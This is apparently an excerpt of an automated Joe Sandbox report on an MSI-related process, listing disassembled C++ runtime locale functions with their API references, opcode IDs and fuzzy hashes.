                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercollate
                                                      • String ID:
                                                      • API String ID: 1007100420-0
                                                      • Opcode ID: 058b8bad7667e4e773dadcf682103e5bbc192c618a11a534daae35af50bd4ec1
                                                      • Instruction ID: 554a4e661477447f1f140e08d830e2626b2229febf6e0e5b08dd92682044d3a7
                                                      • Opcode Fuzzy Hash: 058b8bad7667e4e773dadcf682103e5bbc192c618a11a534daae35af50bd4ec1
                                                      • Instruction Fuzzy Hash: AD018C369002199FCF15FBA4EA51AAE7BB1BF85721F240409F8106B292DF749E49CB91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • __EH_prolog3.LIBCMT ref: 00A525EA
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00A525F4
                                                        • Part of subcall function 00A48C20: std::_Lockit::_Lockit.LIBCPMT ref: 00A48C50
                                                        • Part of subcall function 00A48C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00A48C78
                                                      • messages.LIBCPMT ref: 00A5262E
                                                      • std::_Facet_Register.LIBCPMT ref: 00A52645
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00A52665
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermessages
                                                      • String ID:
                                                      • API String ID: 2750803064-0
                                                      • Opcode ID: ec1d0e65066507b015ea0084ec0c5842059a973fee092e00d9c736bebd00b588
                                                      • Instruction ID: 4da0d4372c0ca4ca8fe564a601d965c6bf4100ca6ea85246a60cd4be08caaa68
                                                      • Opcode Fuzzy Hash: ec1d0e65066507b015ea0084ec0c5842059a973fee092e00d9c736bebd00b588
                                                      • Instruction Fuzzy Hash: E801DE369001199BCF05FBA4DA51ABEB7B1FF91721F244409F8106B291CF749E09CB91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • __EH_prolog3.LIBCMT ref: 00A52555
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00A5255F
                                                        • Part of subcall function 00A48C20: std::_Lockit::_Lockit.LIBCPMT ref: 00A48C50
                                                        • Part of subcall function 00A48C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00A48C78
                                                      • ctype.LIBCPMT ref: 00A52599
                                                      • std::_Facet_Register.LIBCPMT ref: 00A525B0
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00A525D0
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registerctype
                                                      • String ID:
                                                      • API String ID: 83828444-0
                                                      • Opcode ID: a8b7db10573cd1f38cea3dcdb5b01a53d62f008097726484e49fbe56af620dfb
                                                      • Instruction ID: e5b40b232a4b77c246ea4b7e36e9872dfc15e4551a81afceaff3c45c74aaee43
                                                      • Opcode Fuzzy Hash: a8b7db10573cd1f38cea3dcdb5b01a53d62f008097726484e49fbe56af620dfb
                                                      • Instruction Fuzzy Hash: F101D2369011199BCF04FBA4D952AAE77B1BF84721F244809FC11A7292EF789E49CB90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • __EH_prolog3.LIBCMT ref: 00A4D6C4
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00A4D6CE
                                                        • Part of subcall function 00A48C20: std::_Lockit::_Lockit.LIBCPMT ref: 00A48C50
                                                        • Part of subcall function 00A48C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00A48C78
                                                      • codecvt.LIBCPMT ref: 00A4D708
                                                      • std::_Facet_Register.LIBCPMT ref: 00A4D71F
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00A4D73F
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
                                                      • String ID:
                                                      • API String ID: 712880209-0
                                                      • Opcode ID: c72b5c5a76f8d6761fc17fa1444e7ceb79ecb904a4dbdf5fa970f8dbc8674262
                                                      • Instruction ID: 6a61ba61674d2386cf0ab393658e30c536c3756514f223847fe3583626ad63a2
                                                      • Opcode Fuzzy Hash: c72b5c5a76f8d6761fc17fa1444e7ceb79ecb904a4dbdf5fa970f8dbc8674262
                                                      • Instruction Fuzzy Hash: BD01923A9001159FCB15FBA4DA51AAE7BB1BFD4720F240509F8106B292DF749E05C791
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • __EH_prolog3.LIBCMT ref: 00A5267F
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00A52689
                                                        • Part of subcall function 00A48C20: std::_Lockit::_Lockit.LIBCPMT ref: 00A48C50
                                                        • Part of subcall function 00A48C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00A48C78
                                                      • messages.LIBCPMT ref: 00A526C3
                                                      • std::_Facet_Register.LIBCPMT ref: 00A526DA
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00A526FA
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermessages
                                                      • String ID:
                                                      • API String ID: 2750803064-0
                                                      • Opcode ID: 7451f61483ca6bb8754fbfbae8344e3b124eda63c616bd80743db0330258ceb1
                                                      • Instruction ID: ebfece037f73fda1a5b73fc454fd08775d2a0787ff75bbea95ce3957186f7ee6
                                                      • Opcode Fuzzy Hash: 7451f61483ca6bb8754fbfbae8344e3b124eda63c616bd80743db0330258ceb1
                                                      • Instruction Fuzzy Hash: 0F01D2369001159FCF05FBA4DA45ABEB7B1BF84721F244809F81067391CF749E0ACB91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • __EH_prolog3.LIBCMT ref: 00A5E8DF
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00A5E8E9
                                                        • Part of subcall function 00A48C20: std::_Lockit::_Lockit.LIBCPMT ref: 00A48C50
                                                        • Part of subcall function 00A48C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00A48C78
                                                      • messages.LIBCPMT ref: 00A5E923
                                                      • std::_Facet_Register.LIBCPMT ref: 00A5E93A
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00A5E95A
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermessages
                                                      • String ID:
                                                      • API String ID: 2750803064-0
                                                      • Opcode ID: 197f734a79b37de03c9faf48f75891bb4256f9bbe7d057db6d02dd24eff09d13
                                                      • Instruction ID: 7f35c7632251c480955c928a06275d0d88d9554a101f3c11a6c06cb3d6b4c4a1
                                                      • Opcode Fuzzy Hash: 197f734a79b37de03c9faf48f75891bb4256f9bbe7d057db6d02dd24eff09d13
                                                      • Instruction Fuzzy Hash: C501C036900115DFCF08FBA49A41ABEB7B1BF90721F24080AF810AB291CF789F098791
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • __EH_prolog3.LIBCMT ref: 00A5E84A
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00A5E854
                                                        • Part of subcall function 00A48C20: std::_Lockit::_Lockit.LIBCPMT ref: 00A48C50
                                                        • Part of subcall function 00A48C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00A48C78
                                                      • collate.LIBCPMT ref: 00A5E88E
                                                      • std::_Facet_Register.LIBCPMT ref: 00A5E8A5
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00A5E8C5
                                                      Similarity
                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercollate
                                                      • String ID:
                                                      • API String ID: 1007100420-0

                                                      APIs
                                                      • __EH_prolog3.LIBCMT ref: 00A529FD
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00A52A07
                                                        • Part of subcall function 00A48C20: std::_Lockit::_Lockit.LIBCPMT ref: 00A48C50
                                                        • Part of subcall function 00A48C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00A48C78
                                                      • moneypunct.LIBCPMT ref: 00A52A41
                                                      • std::_Facet_Register.LIBCPMT ref: 00A52A58
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00A52A78
                                                      Similarity
                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                      • String ID:
                                                      • API String ID: 419941038-0

                                                      APIs
                                                      • __EH_prolog3.LIBCMT ref: 00A52968
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00A52972
                                                        • Part of subcall function 00A48C20: std::_Lockit::_Lockit.LIBCPMT ref: 00A48C50
                                                        • Part of subcall function 00A48C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00A48C78
                                                      • moneypunct.LIBCPMT ref: 00A529AC
                                                      • std::_Facet_Register.LIBCPMT ref: 00A529C3
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00A529E3
                                                      Similarity
                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                      • String ID:
                                                      • API String ID: 419941038-0

                                                      APIs
                                                      • __EH_prolog3.LIBCMT ref: 00A52A92
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00A52A9C
                                                        • Part of subcall function 00A48C20: std::_Lockit::_Lockit.LIBCPMT ref: 00A48C50
                                                        • Part of subcall function 00A48C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00A48C78
                                                      • moneypunct.LIBCPMT ref: 00A52AD6
                                                      • std::_Facet_Register.LIBCPMT ref: 00A52AED
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00A52B0D
                                                      Similarity
                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                      • String ID:
                                                      • API String ID: 419941038-0

                                                      APIs
                                                      • __EH_prolog3.LIBCMT ref: 00A5EA9E
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00A5EAA8
                                                        • Part of subcall function 00A48C20: std::_Lockit::_Lockit.LIBCPMT ref: 00A48C50
                                                        • Part of subcall function 00A48C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00A48C78
                                                      • moneypunct.LIBCPMT ref: 00A5EAE2
                                                      • std::_Facet_Register.LIBCPMT ref: 00A5EAF9
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00A5EB19
                                                      Similarity
                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                      • String ID:
                                                      • API String ID: 419941038-0

                                                      APIs
                                                      • __EH_prolog3.LIBCMT ref: 00A52B27
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00A52B31
                                                        • Part of subcall function 00A48C20: std::_Lockit::_Lockit.LIBCPMT ref: 00A48C50
                                                        • Part of subcall function 00A48C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00A48C78
                                                      • moneypunct.LIBCPMT ref: 00A52B6B
                                                      • std::_Facet_Register.LIBCPMT ref: 00A52B82
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00A52BA2
                                                      Similarity
                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                      • String ID:
                                                      • API String ID: 419941038-0

                                                      APIs
                                                      • __EH_prolog3.LIBCMT ref: 00A5EB33
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00A5EB3D
                                                        • Part of subcall function 00A48C20: std::_Lockit::_Lockit.LIBCPMT ref: 00A48C50
                                                        • Part of subcall function 00A48C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00A48C78
                                                      • moneypunct.LIBCPMT ref: 00A5EB77
                                                      • std::_Facet_Register.LIBCPMT ref: 00A5EB8E
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00A5EBAE
                                                      Similarity
                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                      • String ID:
                                                      • API String ID: 419941038-0

                                                      APIs
                                                      • __EH_prolog3.LIBCMT ref: 00A52D7B
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00A52D85
                                                        • Part of subcall function 00A48C20: std::_Lockit::_Lockit.LIBCPMT ref: 00A48C50
                                                        • Part of subcall function 00A48C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00A48C78
                                                      • numpunct.LIBCPMT ref: 00A52DBF
                                                      • std::_Facet_Register.LIBCPMT ref: 00A52DD6
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00A52DF6
                                                      Similarity
                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registernumpunct
                                                      • String ID:
                                                      • API String ID: 743221004-0

                                                      APIs
                                                      • EnterCriticalSection.KERNEL32(00A9DD3C,?,?,00A42427,00A9E638,00A86B40), ref: 00A62C58
                                                      • LeaveCriticalSection.KERNEL32(00A9DD3C,?,?,00A42427,00A9E638,00A86B40), ref: 00A62C8B
                                                      • RtlWakeAllConditionVariable.NTDLL ref: 00A62D02
                                                      • SetEvent.KERNEL32(?,00A42427,00A9E638,00A86B40), ref: 00A62D0C
                                                      • ResetEvent.KERNEL32(?,00A42427,00A9E638,00A86B40), ref: 00A62D18
                                                      Similarity
                                                      • API ID: CriticalEventSection$ConditionEnterLeaveResetVariableWake
                                                      • String ID:
                                                      • API String ID: 3916383385-0

                                                      APIs
                                                      • LocalAlloc.KERNEL32(00000040,00000018,838A949E,?,00000000), ref: 00A4BBA3
                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 00A4BD7F
                                                      Similarity
                                                      • API ID: AllocConcurrency::cancel_current_taskLocal
                                                      • String ID: false$true
                                                      • API String ID: 3924972193-2658103896

                                                      APIs
                                                      • __EH_prolog3_GS.LIBCMT ref: 00A5D3D2
                                                        • Part of subcall function 00A5254E: __EH_prolog3.LIBCMT ref: 00A52555
                                                        • Part of subcall function 00A5254E: std::_Lockit::_Lockit.LIBCPMT ref: 00A5255F
                                                        • Part of subcall function 00A5254E: std::_Lockit::~_Lockit.LIBCPMT ref: 00A525D0
                                                      • _Find_elem.LIBCPMT ref: 00A5D46E
                                                      Similarity
                                                      • API ID: Lockitstd::_$Find_elemH_prolog3H_prolog3_Lockit::_Lockit::~_
                                                      • String ID: %.0Lf$0123456789-
                                                      • API String ID: 2544715827-3094241602

                                                      APIs
                                                      • __EH_prolog3_GS.LIBCMT ref: 00A5D676
                                                        • Part of subcall function 00A48610: std::_Lockit::_Lockit.LIBCPMT ref: 00A48657
                                                        • Part of subcall function 00A48610: std::_Lockit::_Lockit.LIBCPMT ref: 00A48679
                                                        • Part of subcall function 00A48610: std::_Lockit::~_Lockit.LIBCPMT ref: 00A486A1
                                                        • Part of subcall function 00A48610: std::_Lockit::~_Lockit.LIBCPMT ref: 00A4880E
                                                      • _Find_elem.LIBCPMT ref: 00A5D712
                                                      Strings
                                                      Similarity
                                                      • API ID: Lockitstd::_$Lockit::_Lockit::~_$Find_elemH_prolog3_
                                                      • String ID: 0123456789-$0123456789-
                                                      • API String ID: 3042121994-2494171821
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • __EH_prolog3_GS.LIBCMT ref: 00A61761
                                                        • Part of subcall function 00A49270: std::_Lockit::_Lockit.LIBCPMT ref: 00A492A0
                                                        • Part of subcall function 00A49270: std::_Lockit::_Lockit.LIBCPMT ref: 00A492C2
                                                        • Part of subcall function 00A49270: std::_Lockit::~_Lockit.LIBCPMT ref: 00A492EA
                                                        • Part of subcall function 00A49270: std::_Lockit::~_Lockit.LIBCPMT ref: 00A49422
                                                      • _Find_elem.LIBCPMT ref: 00A617FB
                                                      Strings
                                                      Similarity
                                                      • API ID: Lockitstd::_$Lockit::_Lockit::~_$Find_elemH_prolog3_
                                                      • String ID: 0123456789-$0123456789-
                                                      • API String ID: 3042121994-2494171821
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • __EH_prolog3.LIBCMT ref: 00A5838D
                                                        • Part of subcall function 00A51C42: _Maklocstr.LIBCPMT ref: 00A51C62
                                                        • Part of subcall function 00A51C42: _Maklocstr.LIBCPMT ref: 00A51C7F
                                                        • Part of subcall function 00A51C42: _Maklocstr.LIBCPMT ref: 00A51C9C
                                                        • Part of subcall function 00A51C42: _Maklocchr.LIBCPMT ref: 00A51CAE
                                                        • Part of subcall function 00A51C42: _Maklocchr.LIBCPMT ref: 00A51CC1
                                                      • _Mpunct.LIBCPMT ref: 00A5841A
                                                      • _Mpunct.LIBCPMT ref: 00A58434
                                                      Strings
                                                      Similarity
                                                      • API ID: Maklocstr$MaklocchrMpunct$H_prolog3
                                                      • String ID: $+xv
                                                      • API String ID: 2939335142-1686923651
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Similarity
                                                      • API ID: Mpunct$H_prolog3
                                                      • String ID: $+xv
                                                      • API String ID: 4281374311-1686923651
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,00A41434,?,00000000), ref: 00A42569
                                                      • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,00A41434,?,00000000), ref: 00A42589
                                                      • LocalFree.KERNEL32(?,00A41434,?,00000000), ref: 00A425DF
                                                      • CloseHandle.KERNEL32(00000000,838A949E,?,00000000,00A83C40,000000FF,00000008,?,?,?,?,00A41434,?,00000000), ref: 00A42633
                                                      • LocalFree.KERNEL32(?,838A949E,?,00000000,00A83C40,000000FF,00000008,?,?,?,?,00A41434), ref: 00A42647
                                                      Similarity
                                                      • API ID: Local$AllocFree$CloseHandle
                                                      • String ID:
                                                      • API String ID: 1291444452-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • GetConsoleOutputCP.KERNEL32(838A949E,?,00000000,?), ref: 00A81DFE
                                                        • Part of subcall function 00A7A9BB: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00A76F5E,?,00000000,-00000008), ref: 00A7AA67
                                                      • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00A82059
                                                      • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00A820A1
                                                      • GetLastError.KERNEL32 ref: 00A82144
                                                      Similarity
                                                      • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                      • String ID:
                                                      • API String ID: 2112829910-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Similarity
                                                      • API ID: _strcspn$H_prolog3_ctype
                                                      • String ID:
                                                      • API String ID: 838279627-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Similarity
                                                      • API ID: _strcspn$H_prolog3_ctype
                                                      • String ID:
                                                      • API String ID: 838279627-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Similarity
                                                      • API ID: AdjustPointer
                                                      • String ID:
                                                      • API String ID: 1740715915-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • GetLastError.KERNEL32(?,?,00000002,80004005,S-1-5-18,00000008), ref: 00A46FB7
                                                      Strings
                                                      Similarity
                                                      • API ID: ErrorLast
                                                      • String ID: > returned:$Call to ShellExecute() for verb<$Last error=
                                                      • API String ID: 1452528299-1781106413
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000004,00000080,00000000,838A949E), ref: 00A4CD1C
                                                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 00A4CD3C
                                                      • WriteFile.KERNEL32(00000000,?,?,?,00000000,?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 00A4CD6D
                                                      • CloseHandle.KERNEL32(00000000,?,?,?,00000000,?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 00A4CD86
                                                      Similarity
                                                      • API ID: File$CloseCreateHandlePointerWrite
                                                      • String ID:
                                                      • API String ID: 3604237281-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • __EH_prolog3.LIBCMT ref: 00A527A9
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00A527B3
                                                        • Part of subcall function 00A48C20: std::_Lockit::_Lockit.LIBCPMT ref: 00A48C50
                                                        • Part of subcall function 00A48C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00A48C78
                                                      • std::_Facet_Register.LIBCPMT ref: 00A52804
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00A52824
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                      • String ID:
                                                      • API String ID: 2854358121-0
                                                      • Opcode ID: 281501fea84f055a34b7e53667eead6a8c588fa3e7a3b04efdb1eac53d89b1e6
                                                      • Instruction ID: f51482af185402995ee9dd9be2370ec046921cbd4290a4b74c115ea29221424b
                                                      • Opcode Fuzzy Hash: 281501fea84f055a34b7e53667eead6a8c588fa3e7a3b04efdb1eac53d89b1e6
                                                      • Instruction Fuzzy Hash: 0901D2369002259BCF15FBB4DA51ABE77B1BF94721F240409FD0167292DF749E0AC791
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • __EH_prolog3.LIBCMT ref: 00A4D7EE
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00A4D7F8
                                                        • Part of subcall function 00A48C20: std::_Lockit::_Lockit.LIBCPMT ref: 00A48C50
                                                        • Part of subcall function 00A48C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00A48C78
                                                      • std::_Facet_Register.LIBCPMT ref: 00A4D849
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00A4D869
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                      • String ID:
                                                      • API String ID: 2854358121-0
                                                      • Opcode ID: 7cae663146e313b7e3b4c2f380742d27f8fb555bc26766c331492ffae0566b73
                                                      • Instruction ID: c8aa271b8c2ef1bbecd878891ec0963d9152450400029329946eb66452b34285
                                                      • Opcode Fuzzy Hash: 7cae663146e313b7e3b4c2f380742d27f8fb555bc26766c331492ffae0566b73
                                                      • Instruction Fuzzy Hash: 2A019E3AD00119DFCB15FBA4DA42ABEB7B1BFD4720F240449F8116B291DF749E468B91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • __EH_prolog3.LIBCMT ref: 00A52714
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00A5271E
                                                        • Part of subcall function 00A48C20: std::_Lockit::_Lockit.LIBCPMT ref: 00A48C50
                                                        • Part of subcall function 00A48C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00A48C78
                                                      • std::_Facet_Register.LIBCPMT ref: 00A5276F
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00A5278F
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                      • String ID:
                                                      • API String ID: 2854358121-0
                                                      • Opcode ID: 747b20a6889f11d899e508037e10883cf0dc0b443bce511c341f6b70fe15d117
                                                      • Instruction ID: 82518954b271b9fe3d459f1a09d3ddb10108ec591b6190b4ff0a4cd2ad0a4c40
                                                      • Opcode Fuzzy Hash: 747b20a6889f11d899e508037e10883cf0dc0b443bce511c341f6b70fe15d117
                                                      • Instruction Fuzzy Hash: F301C036900115DBCF04FBA49A45AAEB7B1BF98721F240509F81067292DF749E0A8B90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • __EH_prolog3.LIBCMT ref: 00A4D759
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00A4D763
                                                        • Part of subcall function 00A48C20: std::_Lockit::_Lockit.LIBCPMT ref: 00A48C50
                                                        • Part of subcall function 00A48C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00A48C78
